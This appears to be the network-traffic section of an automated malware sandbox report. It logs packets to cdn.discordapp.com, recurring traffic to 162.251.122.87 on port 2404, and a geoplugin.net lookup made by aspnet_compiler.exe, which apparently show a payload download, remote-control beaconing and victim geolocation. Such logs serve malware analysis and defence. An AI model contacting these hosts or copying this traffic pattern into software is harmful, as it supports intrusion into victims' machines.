                                                                        Dec 12, 2024 21:31:08.999471903 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.007025957 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.007169008 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.014806986 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.014873981 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.022373915 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.022511005 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.026299953 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.026405096 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.034039974 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.034111977 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.041610956 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.041707993 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.045456886 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.045531988 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.053102970 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.053158045 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.058968067 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.059034109 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.162007093 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.162131071 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.166887999 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.166965961 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.169979095 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.170047998 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.176021099 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.176105022 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.181552887 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.181654930 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.184441090 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.184510946 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.190079927 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.190169096 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.195219040 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.195301056 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.197928905 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.198002100 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.203361988 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.203429937 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.208553076 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.208616018 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.213787079 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.213877916 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.216658115 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.216723919 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.221807003 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.221895933 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.225800991 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.225888014 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.231096983 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.231190920 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.233828068 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.233926058 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.239111900 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.239176989 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.244390965 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.244457960 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.249692917 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.249769926 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.252500057 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.252597094 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.257669926 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.257759094 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.283226013 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.283364058 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.287188053 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.287322044 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.292376041 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.292478085 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.358033895 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.358167887 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.358454943 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.358513117 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.371079922 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.371097088 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.371138096 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.371246099 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.371259928 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.371304989 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.371304989 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.380723953 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.380773067 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.380831957 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.380858898 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.380872011 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.380897045 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.393719912 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.393758059 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.393850088 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.393858910 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.393901110 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.406601906 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.406665087 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.406754017 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.406771898 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.406804085 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.406840086 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.414515972 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.414577961 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.414622068 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.414653063 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.414666891 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.414695024 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.421457052 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.421509027 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.421581030 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.421606064 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.421622038 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.421648026 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.429167986 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.429193974 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.429271936 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.429280996 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.429328918 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.548386097 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.548418999 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.548525095 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.548553944 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.548571110 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.548592091 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.554426908 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.554460049 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.554532051 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.554558039 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.554598093 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.560969114 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.560997009 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.561065912 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.561093092 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.561131001 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.567457914 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.567490101 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.567564011 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.567600965 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.567645073 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.574022055 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.574045897 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.574115992 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.574142933 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.574178934 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.580152035 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.580182076 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.580262899 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.580291033 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.580326080 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.585943937 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.585973024 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.586036921 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.586061954 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.586077929 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.586100101 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.592519045 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.592549086 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.592626095 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.592649937 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.592698097 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.740087032 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.740122080 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.740365982 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.740389109 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.740430117 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.746500969 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.746520996 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.746611118 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.746623039 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.746664047 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.753154993 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.753175020 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.753252983 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.753262997 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.753300905 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.758820057 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.758841038 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.758935928 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.758946896 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.758990049 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.765474081 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.765500069 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.765575886 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.765593052 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.765628099 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.771615028 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.771634102 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.771708965 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.771723032 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.771778107 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.778038025 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.778085947 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.778228998 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.778242111 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.778321028 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.784614086 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.784636974 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.784706116 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.784718990 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.784756899 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.932724953 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.932763100 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.932857037 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.932876110 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.932926893 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.939249992 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.939271927 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.939344883 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.939362049 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.939398050 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.944982052 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.945003033 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.945060015 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.945076942 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.945112944 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.951411963 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.951431036 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.951491117 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.951508999 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.951545954 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.958138943 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.958169937 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.958236933 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.958251953 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.958262920 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.958292007 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.964283943 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.964310884 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.964354992 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.964366913 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.964379072 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.964462996 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.970853090 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.970882893 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.970953941 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.970967054 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.971010923 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.976561069 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.976612091 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.976639986 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.976654053 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.976667881 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.976669073 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:09.976689100 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.976717949 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.976962090 CET49730443192.168.2.4162.159.129.233
                                                                        Dec 12, 2024 21:31:09.976979971 CET44349730162.159.129.233192.168.2.4
                                                                        Dec 12, 2024 21:31:20.681107044 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:20.801109076 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:20.801245928 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:20.806835890 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:20.926600933 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:21.957145929 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:21.997992992 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:22.190824986 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:22.195106030 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:22.323035955 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:22.323120117 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:22.444283962 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:22.670181990 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:22.671756983 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:22.792356968 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:22.862044096 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:22.997555017 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:23.097342014 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:31:23.217178106 CET8049733178.237.33.50192.168.2.4
                                                                        Dec 12, 2024 21:31:23.217263937 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:31:23.229986906 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:31:23.351162910 CET8049733178.237.33.50192.168.2.4
                                                                        Dec 12, 2024 21:31:24.468869925 CET8049733178.237.33.50192.168.2.4
                                                                        Dec 12, 2024 21:31:24.469001055 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:31:24.512650013 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:24.632529020 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:25.468956947 CET8049733178.237.33.50192.168.2.4
                                                                        Dec 12, 2024 21:31:25.469038010 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:31:47.980873108 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:31:48.007822037 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:31:48.127661943 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:32:18.016171932 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:32:18.017565012 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:32:18.137454987 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:32:48.057720900 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:32:48.059263945 CET497312404192.168.2.4162.251.122.87
                                                                        Dec 12, 2024 21:32:48.179332972 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:33:12.888637066 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:33:13.279867887 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:33:13.966649055 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:33:15.336194038 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:33:17.841613054 CET4973380192.168.2.4178.237.33.50
                                                                        Dec 12, 2024 21:33:18.104574919 CET240449731162.251.122.87192.168.2.4
                                                                        Dec 12, 2024 21:33:18.154114008 CET497312404192.168.2.4162.251.122.87
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 12, 2024 21:31:06.732600927 CET5080253192.168.2.41.1.1.1
                                                                        Dec 12, 2024 21:31:06.870827913 CET53508021.1.1.1192.168.2.4
                                                                        Dec 12, 2024 21:31:22.916941881 CET5107553192.168.2.41.1.1.1
                                                                        Dec 12, 2024 21:31:23.058664083 CET53510751.1.1.1192.168.2.4
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 12, 2024 21:31:06.732600927 CET192.168.2.41.1.1.10xe1d6Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:31:22.916941881 CET192.168.2.41.1.1.10x1caeStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 12, 2024 21:31:06.870827913 CET1.1.1.1192.168.2.40xe1d6No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:31:06.870827913 CET1.1.1.1192.168.2.40xe1d6No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:31:06.870827913 CET1.1.1.1192.168.2.40xe1d6No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:31:06.870827913 CET1.1.1.1192.168.2.40xe1d6No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:31:06.870827913 CET1.1.1.1192.168.2.40xe1d6No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:31:23.058664083 CET1.1.1.1192.168.2.40x1caeNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                        • cdn.discordapp.com
                                                                        • geoplugin.net
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449733178.237.33.50807908C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:31:23.229986906 CET71OUTGET /json.gp HTTP/1.1
                                                                        Host: geoplugin.net
                                                                        Cache-Control: no-cache
                                                                        Dec 12, 2024 21:31:24.468869925 CET1171INHTTP/1.1 200 OK
                                                                        date: Thu, 12 Dec 2024 20:31:24 GMT
                                                                        server: Apache
                                                                        content-length: 963
                                                                        content-type: application/json; charset=utf-8
                                                                        cache-control: public, max-age=300
                                                                        access-control-allow-origin: *
